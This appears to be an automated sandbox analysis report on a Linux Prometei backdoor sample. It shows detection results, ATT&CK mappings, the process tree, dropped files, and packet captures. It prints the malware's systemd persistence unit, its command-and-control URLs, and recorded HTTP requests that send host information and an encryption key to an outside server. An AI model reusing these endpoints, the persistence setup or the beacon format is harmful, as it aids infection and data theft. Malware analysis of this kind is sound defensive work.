Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/wCzxNCXdPh (PID: 6224)File: /usr/sbin/uplugplayJump to dropped file
Source: /tmp/wCzxNCXdPh (PID: 6224)File: /tmp/wCzxNCXdPhJump to behavior
Source: wCzxNCXdPhSubmission file: segment LOAD with 7.942 entropy (max. 8.0)
Source: uplugplay.10.drDropped file: segment LOAD with 7.942 entropy (max. 8.0)
Source: /usr/bin/pgrep (PID: 6228)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6238)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 6280)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 6324)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6224)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6275)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6280)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 6329)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/cat (PID: 6286)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Source: /bin/sh (PID: 6329)Uname executable: /usr/bin/uname -> uname -aJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File and Directory Permissions Modification
LSASS Memory4
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits1
Proxy
Manipulate Device CommunicationManipulate App Store Rankings or Ratings
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 666490 Sample: wCzxNCXdPh Startdate: 16/07/2022 Architecture: LINUX Score: 64 76 p3.feefreepool.net 88.198.246.242, 56830, 56832, 80 HETZNER-ASDE Germany 2->76 78 109.202.202.202, 80 INIT7CH Switzerland 2->78 80 5 other IPs or domains 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Found Tor onion address 2->84 86 Sample is packed with UPX 2->86 11 systemd uplugplay 2->11         started        13 wCzxNCXdPh 2->13         started        17 systemd snapd-env-generator 2->17         started        19 systemd snapd-env-generator 2->19         started        signatures3 process4 file5 21 uplugplay 11->21         started        72 /usr/sbin/uplugplay, ELF 13->72 dropped 88 Drops files in suspicious directories 13->88 90 Sample deletes itself 13->90 23 wCzxNCXdPh sh 13->23         started        25 wCzxNCXdPh sh 13->25         started        27 wCzxNCXdPh sh 13->27         started        29 5 other processes 13->29 signatures6 process7 process8 31 uplugplay sh 21->31         started        33 sh pgrep 23->33         started        35 sh pidof 25->35         started        37 sh pgrep 27->37         started        39 sh pgrep 29->39         started        41 sh pidof 29->41         started        43 sh systemctl 29->43         started        45 2 other processes 29->45 process9 47 sh uplugplay 31->47         started        file10 74 /etc/CommId, ASCII 47->74 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 8 other processes 47->56 process11 process12 58 sh cat 50->58         started        60 sh dmidecode 52->60         started        62 sh dmidecode 54->62         started        64 sh dmidecode 56->64         started        66 sh dmidecode 56->66         started        68 sh dmidecode 56->68         started        70 5 other processes 56->70
SourceDetectionScannerLabelLink
wCzxNCXdPh41%VirustotalBrowse
wCzxNCXdPh62%ReversingLabsLinux.Backdoor.Prometei
SourceDetectionScannerLabelLink
/usr/sbin/uplugplay62%ReversingLabsLinux.Backdoor.Prometei
SourceDetectionScannerLabelLink
p3.feefreepool.net9%VirustotalBrowse
SourceDetectionScannerLabelLink
http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg100%Avira URL Cloudmalware
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
http://p3.feefreepool.net/cgi-bin/prometei.cgi100%Avira URL Cloudmalware
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi100%Avira URL Cloudmalware
http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=22&i=57206Y026Q0ZQ3NC100%Avira URL Cloudmalware
http://dummy.zero/cgi-bin/prometei.cgi0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
p3.feefreepool.net
88.198.246.242
truetrueunknown
xinchaobgccha.net
unknown
unknownfalse
    unknown
    xinchaobgccha.org
    unknown
    unknownfalse
      unknown
      xinchaobgccha.com
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=22&i=57206Y026Q0ZQ3NCtrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgwCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://upx.sf.netwCzxNCXdPh, uplugplay.10.drfalse
          high
          http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiwCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://p3.feefreepool.net/cgi-bin/prometei.cgiwCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmptrue
          • Avira URL Cloud: malware
          unknown
          https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgiwCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://dummy.zero/cgi-bin/prometei.cgiwCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmptrue
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          88.198.246.242
          p3.feefreepool.netGermany
          24940HETZNER-ASDEtrue
          109.202.202.202
          unknownSwitzerland
          13030INIT7CHfalse
          91.189.91.43
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          91.189.91.42
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          88.198.246.242zsvcGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=271872B6X2BPQ1Z2
          zJ4GNlikawGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=20&i=PG1TCJ8GTFD7733K
          OLzheOx1kwGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=16&i=MF97754VWVW4HRWU
          wH04DSYf6gGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=16&i=3CL80UN6USPBIKPL
          nRlZAbNdJxGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=53&i=5HNN7ZK1006GY32G
          lHxDIlc6HUGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Z
          PMidZ9jAKZGet hashmaliciousBrowse
          • p3.feefreepool.net/cgi-bin/prometei.cgi?r=58&i=7B1B0KLF45MTZ528
          zsvc.exeGet hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271
          3V9alTXIliGet hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=MKWJIGBKXJXI0948
          promet16Get hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=0X81G723HYG17S60
          promet15Get hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=6214X121I3A61W1S
          promet2Get hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=18&i=MU2G1NCM0HDF3L2N
          EKbGofM1r6Get hashmaliciousBrowse
          • p1.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=ENEP5O05YTLM46K2
          109.202.202.202meH5Zb8Ij2Get hashmaliciousBrowse
            LnYwz3rK1KGet hashmaliciousBrowse
              NaKWLxvxb5Get hashmaliciousBrowse
                q3oD1BTvU4Get hashmaliciousBrowse
                  r1jwp25yOjGet hashmaliciousBrowse
                    DPUJpFmz8xGet hashmaliciousBrowse
                      Ix9EOn1upSGet hashmaliciousBrowse
                        Tthm4UpKI3Get hashmaliciousBrowse
                          jZMFmgQq6MGet hashmaliciousBrowse
                            vV1S5whg9DGet hashmaliciousBrowse
                              ZDruae7979Get hashmaliciousBrowse
                                0adYG3pqxhGet hashmaliciousBrowse
                                  O8WOkWZJjJGet hashmaliciousBrowse
                                    ZBwNOlyzN6Get hashmaliciousBrowse
                                      R9hR93tnV8Get hashmaliciousBrowse
                                        eKYLkdlcmzGet hashmaliciousBrowse
                                          446gO4eSxTGet hashmaliciousBrowse
                                            WAaPbUd9hlGet hashmaliciousBrowse
                                              PQwXUEZAN5Get hashmaliciousBrowse
                                                Nuu6AOH4TGGet hashmaliciousBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  p3.feefreepool.netzsvcGet hashmaliciousBrowse
                                                  • 88.198.246.242
                                                  zJ4GNlikawGet hashmaliciousBrowse
                                                  • 88.198.246.242
                                                  OLzheOx1kwGet hashmaliciousBrowse
                                                  • 88.198.246.242
                                                  wH04DSYf6gGet hashmaliciousBrowse
                                                  • 88.198.246.242
                                                  nRlZAbNdJxGet hashmaliciousBrowse
                                                  • 88.198.246.242
                                                  lHxDIlc6HUGet hashmaliciousBrowse
                                                  • 88.198.246.242
                                                  PMidZ9jAKZGet hashmaliciousBrowse
                                                  • 88.198.246.242
                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  HETZNER-ASDEtDT2c9rE9gGet hashmaliciousBrowse
                                                  • 144.76.145.32
                                                  nz032vqLOi.dllGet hashmaliciousBrowse
                                                  • 78.47.204.80
                                                  nz032vqLOi.dllGet hashmaliciousBrowse
                                                  • 78.47.204.80
                                                  azKC4bycQq.dllGet hashmaliciousBrowse
                                                  • 78.47.204.80
                                                  azKC4bycQq.dllGet hashmaliciousBrowse
                                                  • 78.47.204.80
                                                  c85bb7111441b78c9a14aa094dd2994b4eb66db4ea4cb.exeGet hashmaliciousBrowse
                                                  • 148.251.234.83
                                                  E20920A7259CABE4F4BBEF5BF983181AD47FB8C075D7F.exeGet hashmaliciousBrowse
                                                  • 168.119.228.126
                                                  OO6esbVraZ.exeGet hashmaliciousBrowse
                                                  • 148.251.234.83
                                                  W3bjFhRcxGGet hashmaliciousBrowse
                                                  • 176.9.213.134
                                                  GEKrNvuVRi.exeGet hashmaliciousBrowse
                                                  • 144.76.136.153
                                                  2vKE1aASfc.exeGet hashmaliciousBrowse
                                                  • 144.76.136.153
                                                  allegato-5.xlsGet hashmaliciousBrowse
                                                  • 159.69.237.188
                                                  5fH6UHOtIP.exeGet hashmaliciousBrowse
                                                  • 148.251.234.83
                                                  Banco BPM Payment Copy_doc.pdf.exeGet hashmaliciousBrowse
                                                  • 168.119.191.106
                                                  T4FnZExPAVGet hashmaliciousBrowse
                                                  • 148.251.132.116
                                                  8MiVWYj2ra.exeGet hashmaliciousBrowse
                                                  • 5.161.68.46
                                                  HUrHMu39FU.dllGet hashmaliciousBrowse
                                                  • 78.47.204.80
                                                  HUrHMu39FU.dllGet hashmaliciousBrowse
                                                  • 78.47.204.80
                                                  8QfaZFMbEb.dllGet hashmaliciousBrowse
                                                  • 78.47.204.80
                                                  P22l0y2mfd.dllGet hashmaliciousBrowse
                                                  • 78.47.204.80
                                                  INIT7CHmeH5Zb8Ij2Get hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  LnYwz3rK1KGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  NaKWLxvxb5Get hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  q3oD1BTvU4Get hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  r1jwp25yOjGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  DPUJpFmz8xGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  Ix9EOn1upSGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  Tthm4UpKI3Get hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  jZMFmgQq6MGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  vV1S5whg9DGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  ZDruae7979Get hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  0adYG3pqxhGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  O8WOkWZJjJGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  ZBwNOlyzN6Get hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  R9hR93tnV8Get hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  eKYLkdlcmzGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  446gO4eSxTGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  WAaPbUd9hlGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  PQwXUEZAN5Get hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  Nuu6AOH4TGGet hashmaliciousBrowse
                                                  • 109.202.202.202
                                                  No context
                                                  No context
                                                  Process:/usr/sbin/uplugplay
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):16
                                                  Entropy (8bit):3.327819531114783
                                                  Encrypted:false
                                                  SSDEEP:3:HXwn:3A
                                                  MD5:184DE40751AAA776B068102C86A74BD2
                                                  SHA1:34CBF38A9EA6DEA9D5E4E8FA5B9F94AAAC31FEAF
                                                  SHA-256:1A64C7252BF6305D034374500E4A0AEB772832FC626B18BEF661B183B45B1517
                                                  SHA-512:DC747C10AD69A92CE00950C26592CE4A5EA0F25C887B1C0164D2CE9E2EABCD5B762EB8C0E4382ED6C55E72A1FC01EF1D3149883D5F3B12FC409777FDD18A2B46
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview:57206Y026Q0ZQ3NC
                                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):76
                                                  Entropy (8bit):3.7627880354948586
                                                  Encrypted:false
                                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                  Process:/tmp/wCzxNCXdPh
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):145
                                                  Entropy (8bit):4.769509838572339
                                                  Encrypted:false
                                                  SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
                                                  MD5:8CA62D1F47880BCE036C2956C9B7B272
                                                  SHA1:3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
                                                  SHA-256:C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
                                                  SHA-512:4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.
                                                  Process:/tmp/wCzxNCXdPh
                                                  File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                  Category:dropped
                                                  Size (bytes):428366
                                                  Entropy (8bit):7.9417806178753025
                                                  Encrypted:false
                                                  SSDEEP:12288:lQIkwT+V+46MTuxN+qpMBUH5kAAxwWVtBeSm:N4/y+qaBUZJAdVtq
                                                  MD5:E086414FE570BBB051FDD26D4E9B77C6
                                                  SHA1:99058502F3B29BC51A196E2BD9568094924FBAD5
                                                  SHA-256:C5F5FA85678921FE8A0BD263CD8A03F848C9E8EB88AA27B6DEA7661B659AD7D3
                                                  SHA-512:51ABA4559F8FEF5E8C6F92073BA77BA3F35A13315C5EFD38625231DBE7A606D885041CFA9F35ABA475D6F1B88BF541CD67072448BA545397DA977531F8A9BCC5
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: SUSP_ELF_LNX_UPX_Compressed_File, Description: Detects a suspicious ELF binary with UPX compression, Source: /usr/sbin/uplugplay, Author: Florian Roth
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 62%
                                                  Reputation:low
                                                  Preview:.ELF..............>.....HwF.....@...................@.8...@.......................@.......@.....c.......c.................................F.......F.............................Q.td....................................................d&..UPX!(........8...8..p............. ..ELF......>....@.w.}...0..'8..........W.3c...[......o...| m.@.......o../.NnbK>...o...=...-.Q.`XO.q..i.m`o..p..@b... ....o..d...D_"x.D...O..r.(.S.td`...OQn......oRO.1XG^...$I....T.P.............y......GNU....'..l......?.v....N........l..9N.F........_....R.%..y...kM./.l../.. .D.0..v!#.../...]`..p7K........_...E.P.L...lH...dG......@...;..._..C2..../.6.\.K...x......po0F^.'h.P.`.2.B..Xpr.b'P/..LH\.'..@..pr1.8?P0.d..o..(.8..N ?p.I...J.$......c...I&.n.......H...H...H..t..."...9.....?..%......D................................}....ume....]U....ME=....5-%..................&..E.t$..T$.<{....%.....H.|$....\9.g...Sd2.OH.. ......kn(...$. 1.H9.`[..t>d....4..u......>2..w..H.. -U.H.=$...o....... ......=.._w.Ru6...k.
                                                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                  Entropy (8bit):7.9417806178753025
                                                  TrID:
                                                  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                  File name:wCzxNCXdPh
                                                  File size:428366
                                                  MD5:e086414fe570bbb051fdd26d4e9b77c6
                                                  SHA1:99058502f3b29bc51a196e2bd9568094924fbad5
                                                  SHA256:c5f5fa85678921fe8a0bd263cd8a03f848c9e8eb88aa27b6dea7661b659ad7d3
                                                  SHA512:51aba4559f8fef5e8c6f92073ba77ba3f35a13315c5efd38625231dbe7a606d885041cfa9f35aba475d6f1b88bf541cd67072448ba545397da977531f8a9bcc5
                                                  SSDEEP:12288:lQIkwT+V+46MTuxN+qpMBUH5kAAxwWVtBeSm:N4/y+qaBUZJAdVtq
                                                  TLSH:1E9423F31424B3738A2C3A3EFF609E05D7A9573CE55A271A1A1FDDEB0F2951209C8A05
                                                  File Content Preview:.ELF..............>.....HwF.....@...................@.8...@.......................@.......@.....c.......c.................................F.......F.............................Q.td....................................................d&..UPX!(........8...8.

                                                  ELF header

                                                  Class:ELF64
                                                  Data:2's complement, little endian
                                                  Version:1 (current)
                                                  Machine:Advanced Micro Devices X86-64
                                                  Version Number:0x1
                                                  Type:EXEC (Executable file)
                                                  OS/ABI:UNIX - System V
                                                  ABI Version:0
                                                  Entry Point Address:0x467748
                                                  Flags:0x0
                                                  ELF Header Size:64
                                                  Program Header Offset:64
                                                  Program Header Size:56
                                                  Number of Program Headers:3
                                                  Section Header Offset:0
                                                  Section Header Size:64
                                                  Number of Section Headers:0
                                                  Header String Table Index:0
                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                  LOAD0x00x4000000x4000000x680630x680637.94200x5R E0x1000
                                                  LOAD0x00x4690000x4690000x00x10fb0f80.00000x6RW 0x1000
                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 16, 2022 21:54:08.170191050 CEST42836443192.168.2.2391.189.91.43
                                                  Jul 16, 2022 21:54:08.938034058 CEST4251680192.168.2.23109.202.202.202
                                                  Jul 16, 2022 21:54:22.357017994 CEST5683080192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:22.379415035 CEST805683088.198.246.242192.168.2.23
                                                  Jul 16, 2022 21:54:22.379661083 CEST5683080192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:22.550740957 CEST5683080192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:22.607476950 CEST805683088.198.246.242192.168.2.23
                                                  Jul 16, 2022 21:54:22.607516050 CEST805683088.198.246.242192.168.2.23
                                                  Jul 16, 2022 21:54:22.607657909 CEST5683080192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:22.649354935 CEST5683080192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:22.770251036 CEST5683080192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:22.792568922 CEST805683088.198.246.242192.168.2.23
                                                  Jul 16, 2022 21:54:23.277251005 CEST43928443192.168.2.2391.189.91.42
                                                  Jul 16, 2022 21:54:27.543972969 CEST5683280192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:27.567747116 CEST805683288.198.246.242192.168.2.23
                                                  Jul 16, 2022 21:54:27.567925930 CEST5683280192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:27.570584059 CEST5683280192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:27.630609035 CEST805683288.198.246.242192.168.2.23
                                                  Jul 16, 2022 21:54:27.630651951 CEST805683288.198.246.242192.168.2.23
                                                  Jul 16, 2022 21:54:27.630745888 CEST5683280192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:27.632152081 CEST5683280192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:27.655776024 CEST805683288.198.246.242192.168.2.23
                                                  Jul 16, 2022 21:54:35.560684919 CEST42836443192.168.2.2391.189.91.43
                                                  Jul 16, 2022 21:54:39.656647921 CEST4251680192.168.2.23109.202.202.202
                                                  Jul 16, 2022 21:55:04.231272936 CEST43928443192.168.2.2391.189.91.42
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 16, 2022 21:54:22.334445000 CEST3818153192.168.2.238.8.8.8
                                                  Jul 16, 2022 21:54:22.354221106 CEST53381818.8.8.8192.168.2.23
                                                  Jul 16, 2022 21:54:23.662626982 CEST4872280192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:54:27.523026943 CEST5050053192.168.2.238.8.8.8
                                                  Jul 16, 2022 21:54:27.543746948 CEST53505008.8.8.8192.168.2.23
                                                  Jul 16, 2022 21:56:24.404326916 CEST5873080192.168.2.2388.198.246.242
                                                  Jul 16, 2022 21:56:28.919825077 CEST3938953192.168.2.238.8.8.8
                                                  Jul 16, 2022 21:56:28.940368891 CEST53393898.8.8.8192.168.2.23
                                                  Jul 16, 2022 21:56:28.942378998 CEST3871653192.168.2.238.8.8.8
                                                  Jul 16, 2022 21:56:28.963007927 CEST53387168.8.8.8192.168.2.23
                                                  Jul 16, 2022 21:56:28.964837074 CEST4209153192.168.2.238.8.8.8
                                                  Jul 16, 2022 21:56:28.999432087 CEST53420918.8.8.8192.168.2.23
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Jul 16, 2022 21:54:22.334445000 CEST192.168.2.238.8.8.80x1888Standard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                                  Jul 16, 2022 21:54:27.523026943 CEST192.168.2.238.8.8.80x1888Standard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                                  Jul 16, 2022 21:56:28.919825077 CEST192.168.2.238.8.8.80x1888Standard query (0)xinchaobgccha.netA (IP address)IN (0x0001)
                                                  Jul 16, 2022 21:56:28.942378998 CEST192.168.2.238.8.8.80x1888Standard query (0)xinchaobgccha.orgA (IP address)IN (0x0001)
                                                  Jul 16, 2022 21:56:28.964837074 CEST192.168.2.238.8.8.80x1888Standard query (0)xinchaobgccha.comA (IP address)IN (0x0001)
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Jul 16, 2022 21:54:22.354221106 CEST8.8.8.8192.168.2.230x1888No error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                                  Jul 16, 2022 21:54:27.543746948 CEST8.8.8.8192.168.2.230x1888No error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                                  Jul 16, 2022 21:56:28.940368891 CEST8.8.8.8192.168.2.230x1888Name error (3)xinchaobgccha.netnonenoneA (IP address)IN (0x0001)
                                                  Jul 16, 2022 21:56:28.963007927 CEST8.8.8.8192.168.2.230x1888Name error (3)xinchaobgccha.orgnonenoneA (IP address)IN (0x0001)
                                                  Jul 16, 2022 21:56:28.999432087 CEST8.8.8.8192.168.2.230x1888Name error (3)xinchaobgccha.comnonenoneA (IP address)IN (0x0001)
                                                  • p3.feefreepool.net
                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  0192.168.2.235683088.198.246.24280
                                                  TimestampkBytes transferredDirectionData
                                                  Jul 16, 2022 21:54:22.550740957 CEST0OUTGET /cgi-bin/prometei.cgi?r=22&i=57206Y026Q0ZQ3NC HTTP/1.0
                                                  Host: p3.feefreepool.net
                                                  Jul 16, 2022 21:54:22.607476950 CEST0INHTTP/1.1 200 OK
                                                  Date: Sat, 16 Jul 2022 19:54:41 GMT
                                                  Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                                  Content-Length: 7
                                                  Connection: close
                                                  Content-Type: text/html; charset=windows-1251
                                                  Data Raw: 73 79 73 69 6e 66 6f
                                                  Data Ascii: sysinfo


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192.168.2.235683288.198.246.24280
                                                  TimestampkBytes transferredDirectionData
                                                  Jul 16, 2022 21:54:27.570584059 CEST2OUTGET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wNVZfVW5peDY0QDI3Q001Qzg5VTNKMzE1OTdIVg0KZ2FsYXNzaWENCg0KMnggSW50ZWwoUikgWGVvbihSKSBTaWx2ZXIgNDIxMCBDUFUgQCAyLjIwR0h6DQoNCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSANCg0KL3Vzci9zYmluLw0KIDIxOjU0OjI2IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjMxLCAwLjkyLCAwLjM3DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=57206Y026Q0ZQ3NC&h=galassia&enckey=SnFWPItpC9Atz6On493V8kdaGFXHT/92MdWZdfpjFfy22c/OkAVObQS5nO7FGhYe9rRN8rN4ZtKM3JY5p8wb6exRL6Oec497Q2PF0E1DueuWYg4BUOp7V1UUMf/PC8Kg9FZAUaXa4xQgn7CRWVJ/tUe7OKPolf2MdPB3il0Lcnw= HTTP/1.0
                                                  Host: p3.feefreepool.net
